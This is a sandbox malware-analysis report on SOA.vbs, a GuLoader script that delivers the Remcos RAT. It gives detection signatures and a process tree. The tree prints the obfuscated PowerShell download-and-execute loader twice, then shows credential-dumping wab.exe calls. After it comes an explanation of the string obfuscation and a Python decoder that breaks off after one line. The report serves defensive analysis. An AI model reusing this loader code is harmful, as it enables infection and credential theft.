
Windows Analysis Report
SOA.vbs

Overview

General Information

Sample name: SOA.vbs
Analysis ID: 1465863
MD5: 5eb7f6fdbef3c0d5203a8a04a09f2b39
SHA1: 6931cbc28345d13ca66694f5059c05d4f8889f73
SHA256: 9bb93f41ee5ed09fe6ad9c7c150dbc06280ee08f746d9a1ac9da501d7ad53c9e
Tags: GuLoaderRATRemcosRATvbs

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4084 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: 
Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.rurenaVekslerlOttom nePassersoMent lha BallisnVivariidPrimasse,ruitbesStetikkiHjemstatSnaph neSkrukh.)Meretr. 
');Sarcophilus (Brassart ' abong$UtmmeligDragelsl stak,eo hoirwib WartleaBffengolBasebal:Fejl,asBParodiel SkyldsoCopo,ymo PensiodDdlkkerr Lavesto HalvenoTvangsftAde,omo= Ue enn$DrblernSArbejdsk UanselrBalle.eb ForvrieKulle slover.ari Skinang Fuldbat Babasc1.roathl5Spoonb,7 Antidr.BloodtesAfske.spOvercomlBidragsiCrot.nttT,ansve( Ordnyo$ingenirC Snert,oBarnedan Pred.bsUgrssetc recoloiB.rdolpo,xtermin FaradiaAfdelinbRygelselUhaandteCestoshnGlobalseBeneficsAssu.ersTeddip )Nonrege ');Sarcophilus (Brassart 'Elvrks,[MarkedsNMerisise talerstLeasing.SonshipSAvertere Forsder,anidiavCrewmemi TopnglcKonomsaeTr.vlemPRe,ervioInternai nonsabnOpercultddstegnM SeborramumbudgnInfusioaArchiepgUnderdeeOplysnir Bu.lhe]Strolls: Fal.ib: parinS BootsteVimineocStanduruRiantagrBeg.deliBaudrattTipier yParticuPUdearberPhenylao Non.irt Fedtsmo untrifcShamecaoTrf,erel Styreh Crystal=Stroppi Specif [.ilodenNHelaafke MnterntBrednin.NonpathS Pa.ticeCollinscboganm uBedsp.or,rndeviiInkassotBanesaay irreduP toptyvrBygge ao HighlatShog.unoD.theryc kammenoBadel.glNdvendiTOpdatery MglingpbrachiaeEl.ctro] Orange:Scaletl:CrowdedTOps.revlPapirstsVenomos1Forvund2Mandril ');$Skrbeligt157=$Bloodroot[0];$Afguder= (Brassart 'Krohold$ EloinigholocenlGaveafgoEctomerb TerritaRenunculContain: AflvniH Emanc,iKeyma lgTillaegh ValidebR usenuaMeta,ralunbundll linguisKamera,=EfterliNOutsavoe ombazw Synneu-gedebolOTopcoatbfrsteopjvar.edneEkstempc KlemtvtCheekpi vindic SZizyphuyTimonias krydsmtAn tomie Raffl,mUnderbe. 
maskinNDep,ecieYvindsptMon.oli.KvilibrWDakoitieLyrer,ebNonfixaCClinkstlDemimoniBriseiserationenTilstedt');$Afguder+=$Inexertion[1];Sarcophilus ($Afguder);Sarcophilus (Brassart ' Stngen$.efektiH olphiniChristigH.farveh AfbenybExtrasea StosnilUnderbulBasnglesVrdia,g.EncreasHAppropieEft,rbeaSuggestdFi palueHypermer,askekus Skr.ld[ hroni$Sta.usoCAnkelsoaHandelsp kanderkHuovertiOrientenUdvikli] Benzoa=Moyleu,$Sund,edDAsthorieT.unkfil Azollae P,rtystNoce ceiUn,ervivTachygeeSlipove ');$breplansbaad=Brassart 'inholdi$HalopsyHStellari BibliogKi skejh Longhebcylindra erohylMbel,ablNiveau.sPlane,a.BlthaveDJagtgstoPseudoswthe mogn CavlinlTintefeoDingenoaRykkerbdReperc,F .yngdeiLgehuselUnsupere ,amliv( El.ond$Stirre,SRe,tartkKi,dredrSlukninb West.aeShielddlShoecrai KonfiggFyringstHandels1 Perthi5Sar,ens7 Sniffi, Sympat$MassesuS OmlasttBo,anopaRelendinEnrheumdTran,itaMindsterBevgeapdInf,atiiKokosndsPokinglaContaint LooingiDelegatoTetanolnHomotrasu smidn) Dipt r ';$Standardisations=$Inexertion[0];Sarcophilus (Brassart 'Undece.$CotraitgvippedelUnderpuoRejoicibFrilanda S,ekodlNontran:Voluntes Ko.plet ElvesqaBlomst v Wh,tsolPaedophyNrmertrgTrkproctFrak,ioeAkselafrh,tzerssRepract=jespejl(tipbartT S.rtkueStandars,narchitFagacea- colandP Delsteasalvad tGl,nsnuh Norman Vrksted$Margi sSBaginditGolftrjaSuprasqnHema oxdCanthutaTsesantr NoncomdEibrittiParodics SemestaAchaemet CriminiDisgraco Thre,tnAggregasErg,ter)tempori ');while (!$stavlygters) {Sarcophilus (Brassart ' Sonsie$Konservg Crocial BostnioOffervibFloragraskriveml Lum.er:EksisteH S,ikkev Un.erbn,ireraue DeposarBogma,k=Snapsfl$PreaccutImp nitrAcetylsuArticuleAbsorbe ') ;Sarcophilus $breplansbaad;Sarcophilus (Brassart 'Rgerli,SSm thertChalqueaEctocunrD.pravetrebroac-Ungt liSYver,idlGttevrke Aktualegen ralpOverfla F.brika4Vegetat ');Sarcophilus (Brassart 'Tchapan$PlovskrgAircondlGangninoGi termbOvervinaRigsarklVaabenm:,ansslus ProgratOpgrelsaSethprdv TrolovlKonsuley Me.tingDenyerat Forep eAu ocarrreinvessSpaltet=Transce(G,rhamiT 
mbelfae Meste sAntimettCasca,o- SpritbP Banesaagruntsct Omsalgh Halvku m.narc$MarchpaSWiederhtFeuderva PolyphnReballodO,eratiaUnderskrCrammeldMenneskiraflendsFjendtla NongymtRandomniFremmedoTilintenBaculess,ychosi)Afkor.e ') ;Sarcophilus (Brassart 'Songsm $ TurritgAnti,rol upmanwo KravlebIsomalta Hamatal Omd ni:ReticulICounternVebogenfHyperdioSaltingrBlawingm Avle.ya ntervotAfgoerei DumpedcResurseaCoalise2 Ancres0 Diffra0Borityj=Reassur$Soranskg,uckhoulMauricioTuftsblbOutrhymaGazettel Standa:InterioB tolerarPatriotiTostadol .semafl SorehoiNear,rdager.temnAreopagcdiaxiali FetisheStitchwsVeinle,+ Havned+Teg,ede%Stenoty$OpraabtBIngui olSmutturoVeludvio Ebbiskd trfferrMacera,oAnisoptoFonetiktIns,rin.PlateaucDecimaloAdu ticuSurinamnOwnabletRaklebr ') ;$Skrbeligt157=$Bloodroot[$Informatica200];}$Kontekstfri=314175;$Untastefulness=30570;Sarcophilus (Brassart 'Outpush$ ReopergFolketilVerfendo Hyacinbno.answaAcrimonlsailo.i:AromatiFCaciqueoInterner Gyptolb FljeneyWithanitAulaegutC ukkere.sonnrrrSaltvan breamun=Ste,mep InclusGDisordeeCirkulatno voli-AfglatcCStan.aroI,ereskn Morf.rtAsker,geCumaruonsulta.etF.imure Sydsles$MicroanSAnteprotEnklesta SwartynS ecifid H.pertaHovedkarIlddaabdCotyla,iSeromans SysletaBalsamitExosmosiMarlingo.kjtebanPanteresUnchari ');Sarcophilus (Brassart 'Udekamp$ monon gF,emkallSulfoneokolibakbvidnefraSystemsl Scilli:L,censuRSpe.dere UnencunN crotogSnirkleu liniese .ecert Castrat=Fgte,ne Unsupp[ Ghe toS StudieyCinderis.rotosaton.matoeUfoenanmStnknin. 
SwizzlC Thayneo,uillain AffektvWuggisheFedestirDkslastt Sorc r]grundpr: Stim.l:AdventuF.ragmenrPr tovuoSk.oldlm.rukkenBervilseaHypoptesTubercueAfounde6Paspalu4BlddeleSTrach,mt Abla,irAmphoroiOvers,rnRegnemsg Hnenth(.anseor$ .ystmoFAstronooF emskrrGothshjbcombustyAccentetInhumertSkema,ieWallabyrEntea,l).inigol ');Sarcophilus (Brassart 'Inte va$Uneatingti etallNonextioAntispibFingersaSkj.ebalOpsigel:A teriicsgernebo Ut lism.anktbem Forkv.eAssertrrGrundbgc Supe diPikkenda Radi.blThorvaliTerrorizUnl gisiProjektnGenskabgKomedie Wyliesk=Buelamp Panikke[Unc mprSBartendyDiabetes LangtitnonexuleGa,erskmBaar.rf. AviatoT UnjoureTarsioix FlawfltAl ergi.UnfrangEPlisseenLysreklcKilendeoA tenuad dtungeiHar anhnMinbugsg pixpap]S,iklag:Obconic:Misi teAHeksen.SCounterC.tjlernIStarkypIPaalgsc.ModigstGBart nde Pallout M,nunaSReplik,tvggenstrSabbatii StruggnUdstykkgRagtim.(bladder$.elefonR,rthogreItineranAfdoedtgRemateduRadioakeMisfeat)Datauhe ');Sarcophilus (Brassart 'Bailage$Scler.sgBes vdol nidudioKanutudb eripeaSintri.lCa,ital:Daane oUUdlbstinMateriacP otoplrSalatoly ramatusSynchrotSangu ma capryllApastrolSti,hediKo,eplazPoloskjaTil ntebGoodwiliServi pl enecoliTypehustAffaldsiGavottieA,tomatsSpandre=Tilstrm$ Fejlrec,omputeoMis.etrmInva idmTaflerte For lirLderpuncUl.iereiArgumenaActinull SculleiGr.bworzEspad iiBrugstyn Boble gTrammel. Digamms Ge,tatu hamfebReglemesLer aretAmar,nerSchoo.siFysiurgnFladbl,gHerskab(En.erso$La.aniaKFngselsoSnderlenBilineatU,blusheUnpitiek S,reflsHeikesltHera lefTillbe.rS,elteriEpiphys,Morbro $ ActinoUDotlikenIngravet Skrivea SubmersMystifitTraitoreLetterifTenen.uu lleapplNonrespn Mismo eDemeritsPersonasarsenic)Rhinsku ');Sarcophilus $Uncrystallizabilities;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5396 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7368 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: 
Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.rurenaVekslerlOttom nePassersoMent lha BallisnVivariidPrimasse,ruitbesStetikkiHjemstatSnaph neSkrukh.)Meretr. 
');Sarcophilus (Brassart ' abong$UtmmeligDragelsl stak,eo hoirwib WartleaBffengolBasebal:Fejl,asBParodiel SkyldsoCopo,ymo PensiodDdlkkerr Lavesto HalvenoTvangsftAde,omo= Ue enn$DrblernSArbejdsk UanselrBalle.eb ForvrieKulle slover.ari Skinang Fuldbat Babasc1.roathl5Spoonb,7 Antidr.BloodtesAfske.spOvercomlBidragsiCrot.nttT,ansve( Ordnyo$ingenirC Snert,oBarnedan Pred.bsUgrssetc recoloiB.rdolpo,xtermin FaradiaAfdelinbRygelselUhaandteCestoshnGlobalseBeneficsAssu.ersTeddip )Nonrege ');Sarcophilus (Brassart 'Elvrks,[MarkedsNMerisise talerstLeasing.SonshipSAvertere Forsder,anidiavCrewmemi TopnglcKonomsaeTr.vlemPRe,ervioInternai nonsabnOpercultddstegnM SeborramumbudgnInfusioaArchiepgUnderdeeOplysnir Bu.lhe]Strolls: Fal.ib: parinS BootsteVimineocStanduruRiantagrBeg.deliBaudrattTipier yParticuPUdearberPhenylao Non.irt Fedtsmo untrifcShamecaoTrf,erel Styreh Crystal=Stroppi Specif [.ilodenNHelaafke MnterntBrednin.NonpathS Pa.ticeCollinscboganm uBedsp.or,rndeviiInkassotBanesaay irreduP toptyvrBygge ao HighlatShog.unoD.theryc kammenoBadel.glNdvendiTOpdatery MglingpbrachiaeEl.ctro] Orange:Scaletl:CrowdedTOps.revlPapirstsVenomos1Forvund2Mandril ');$Skrbeligt157=$Bloodroot[0];$Afguder= (Brassart 'Krohold$ EloinigholocenlGaveafgoEctomerb TerritaRenunculContain: AflvniH Emanc,iKeyma lgTillaegh ValidebR usenuaMeta,ralunbundll linguisKamera,=EfterliNOutsavoe ombazw Synneu-gedebolOTopcoatbfrsteopjvar.edneEkstempc KlemtvtCheekpi vindic SZizyphuyTimonias krydsmtAn tomie Raffl,mUnderbe. 
maskinNDep,ecieYvindsptMon.oli.KvilibrWDakoitieLyrer,ebNonfixaCClinkstlDemimoniBriseiserationenTilstedt');$Afguder+=$Inexertion[1];Sarcophilus ($Afguder);Sarcophilus (Brassart ' Stngen$.efektiH olphiniChristigH.farveh AfbenybExtrasea StosnilUnderbulBasnglesVrdia,g.EncreasHAppropieEft,rbeaSuggestdFi palueHypermer,askekus Skr.ld[ hroni$Sta.usoCAnkelsoaHandelsp kanderkHuovertiOrientenUdvikli] Benzoa=Moyleu,$Sund,edDAsthorieT.unkfil Azollae P,rtystNoce ceiUn,ervivTachygeeSlipove ');$breplansbaad=Brassart 'inholdi$HalopsyHStellari BibliogKi skejh Longhebcylindra erohylMbel,ablNiveau.sPlane,a.BlthaveDJagtgstoPseudoswthe mogn CavlinlTintefeoDingenoaRykkerbdReperc,F .yngdeiLgehuselUnsupere ,amliv( El.ond$Stirre,SRe,tartkKi,dredrSlukninb West.aeShielddlShoecrai KonfiggFyringstHandels1 Perthi5Sar,ens7 Sniffi, Sympat$MassesuS OmlasttBo,anopaRelendinEnrheumdTran,itaMindsterBevgeapdInf,atiiKokosndsPokinglaContaint LooingiDelegatoTetanolnHomotrasu smidn) Dipt r ';$Standardisations=$Inexertion[0];Sarcophilus (Brassart 'Undece.$CotraitgvippedelUnderpuoRejoicibFrilanda S,ekodlNontran:Voluntes Ko.plet ElvesqaBlomst v Wh,tsolPaedophyNrmertrgTrkproctFrak,ioeAkselafrh,tzerssRepract=jespejl(tipbartT S.rtkueStandars,narchitFagacea- colandP Delsteasalvad tGl,nsnuh Norman Vrksted$Margi sSBaginditGolftrjaSuprasqnHema oxdCanthutaTsesantr NoncomdEibrittiParodics SemestaAchaemet CriminiDisgraco Thre,tnAggregasErg,ter)tempori ');while (!$stavlygters) {Sarcophilus (Brassart ' Sonsie$Konservg Crocial BostnioOffervibFloragraskriveml Lum.er:EksisteH S,ikkev Un.erbn,ireraue DeposarBogma,k=Snapsfl$PreaccutImp nitrAcetylsuArticuleAbsorbe ') ;Sarcophilus $breplansbaad;Sarcophilus (Brassart 'Rgerli,SSm thertChalqueaEctocunrD.pravetrebroac-Ungt liSYver,idlGttevrke Aktualegen ralpOverfla F.brika4Vegetat ');Sarcophilus (Brassart 'Tchapan$PlovskrgAircondlGangninoGi termbOvervinaRigsarklVaabenm:,ansslus ProgratOpgrelsaSethprdv TrolovlKonsuley Me.tingDenyerat Forep eAu ocarrreinvessSpaltet=Transce(G,rhamiT 
mbelfae Meste sAntimettCasca,o- SpritbP Banesaagruntsct Omsalgh Halvku m.narc$MarchpaSWiederhtFeuderva PolyphnReballodO,eratiaUnderskrCrammeldMenneskiraflendsFjendtla NongymtRandomniFremmedoTilintenBaculess,ychosi)Afkor.e ') ;Sarcophilus (Brassart 'Songsm $ TurritgAnti,rol upmanwo KravlebIsomalta Hamatal Omd ni:ReticulICounternVebogenfHyperdioSaltingrBlawingm Avle.ya ntervotAfgoerei DumpedcResurseaCoalise2 Ancres0 Diffra0Borityj=Reassur$Soranskg,uckhoulMauricioTuftsblbOutrhymaGazettel Standa:InterioB tolerarPatriotiTostadol .semafl SorehoiNear,rdager.temnAreopagcdiaxiali FetisheStitchwsVeinle,+ Havned+Teg,ede%Stenoty$OpraabtBIngui olSmutturoVeludvio Ebbiskd trfferrMacera,oAnisoptoFonetiktIns,rin.PlateaucDecimaloAdu ticuSurinamnOwnabletRaklebr ') ;$Skrbeligt157=$Bloodroot[$Informatica200];}$Kontekstfri=314175;$Untastefulness=30570;Sarcophilus (Brassart 'Outpush$ ReopergFolketilVerfendo Hyacinbno.answaAcrimonlsailo.i:AromatiFCaciqueoInterner Gyptolb FljeneyWithanitAulaegutC ukkere.sonnrrrSaltvan breamun=Ste,mep InclusGDisordeeCirkulatno voli-AfglatcCStan.aroI,ereskn Morf.rtAsker,geCumaruonsulta.etF.imure Sydsles$MicroanSAnteprotEnklesta SwartynS ecifid H.pertaHovedkarIlddaabdCotyla,iSeromans SysletaBalsamitExosmosiMarlingo.kjtebanPanteresUnchari ');Sarcophilus (Brassart 'Udekamp$ monon gF,emkallSulfoneokolibakbvidnefraSystemsl Scilli:L,censuRSpe.dere UnencunN crotogSnirkleu liniese .ecert Castrat=Fgte,ne Unsupp[ Ghe toS StudieyCinderis.rotosaton.matoeUfoenanmStnknin. 
SwizzlC Thayneo,uillain AffektvWuggisheFedestirDkslastt Sorc r]grundpr: Stim.l:AdventuF.ragmenrPr tovuoSk.oldlm.rukkenBervilseaHypoptesTubercueAfounde6Paspalu4BlddeleSTrach,mt Abla,irAmphoroiOvers,rnRegnemsg Hnenth(.anseor$ .ystmoFAstronooF emskrrGothshjbcombustyAccentetInhumertSkema,ieWallabyrEntea,l).inigol ');Sarcophilus (Brassart 'Inte va$Uneatingti etallNonextioAntispibFingersaSkj.ebalOpsigel:A teriicsgernebo Ut lism.anktbem Forkv.eAssertrrGrundbgc Supe diPikkenda Radi.blThorvaliTerrorizUnl gisiProjektnGenskabgKomedie Wyliesk=Buelamp Panikke[Unc mprSBartendyDiabetes LangtitnonexuleGa,erskmBaar.rf. AviatoT UnjoureTarsioix FlawfltAl ergi.UnfrangEPlisseenLysreklcKilendeoA tenuad dtungeiHar anhnMinbugsg pixpap]S,iklag:Obconic:Misi teAHeksen.SCounterC.tjlernIStarkypIPaalgsc.ModigstGBart nde Pallout M,nunaSReplik,tvggenstrSabbatii StruggnUdstykkgRagtim.(bladder$.elefonR,rthogreItineranAfdoedtgRemateduRadioakeMisfeat)Datauhe ');Sarcophilus (Brassart 'Bailage$Scler.sgBes vdol nidudioKanutudb eripeaSintri.lCa,ital:Daane oUUdlbstinMateriacP otoplrSalatoly ramatusSynchrotSangu ma capryllApastrolSti,hediKo,eplazPoloskjaTil ntebGoodwiliServi pl enecoliTypehustAffaldsiGavottieA,tomatsSpandre=Tilstrm$ Fejlrec,omputeoMis.etrmInva idmTaflerte For lirLderpuncUl.iereiArgumenaActinull SculleiGr.bworzEspad iiBrugstyn Boble gTrammel. Digamms Ge,tatu hamfebReglemesLer aretAmar,nerSchoo.siFysiurgnFladbl,gHerskab(En.erso$La.aniaKFngselsoSnderlenBilineatU,blusheUnpitiek S,reflsHeikesltHera lefTillbe.rS,elteriEpiphys,Morbro $ ActinoUDotlikenIngravet Skrivea SubmersMystifitTraitoreLetterifTenen.uu lleapplNonrespn Mismo eDemeritsPersonasarsenic)Rhinsku ');Sarcophilus $Uncrystallizabilities;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7456 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7732 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7928 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7936 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7952 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7960 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7968 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xkkian" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
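The PowerShell stage above hides every string behind a helper named `Brassart`: `$Transplantat` goes from `$null` to 1 only when `$host.CurrentCulture` is non-empty, after which `Substring($i, $Transplantat)` is collected for `$i` = 7, 15, 23, ... while `$i -lt Length - $Transplantat`. In other words every eighth character is payload and the seven before it are junk (mostly Danish dictionary words with a random character replaced by `.`, `,` or a space). On a host where `CurrentCulture` is empty, every string decodes to nothing and the `&` invoker has nothing to call, so the script fails instead of running. The following decoder is an added example, not code from the report, the sandbox or the sample; the sample strings are copied from the command line on this page, and the "length is a multiple of 8" integrity check is an observation about this sample's strings, not a property of the scheme in general.

```python
"""Decoder for the string scheme in the PowerShell stage of SOA.vbs.

Added example; not code from the Joe Sandbox report or from the sample.
Reimplements the Brassart function seen in the command line: payload is
every eighth character (index 7, 15, 23, ...), the rest is junk words.
"""

BLOCK = 8  # seven junk characters followed by one payload character


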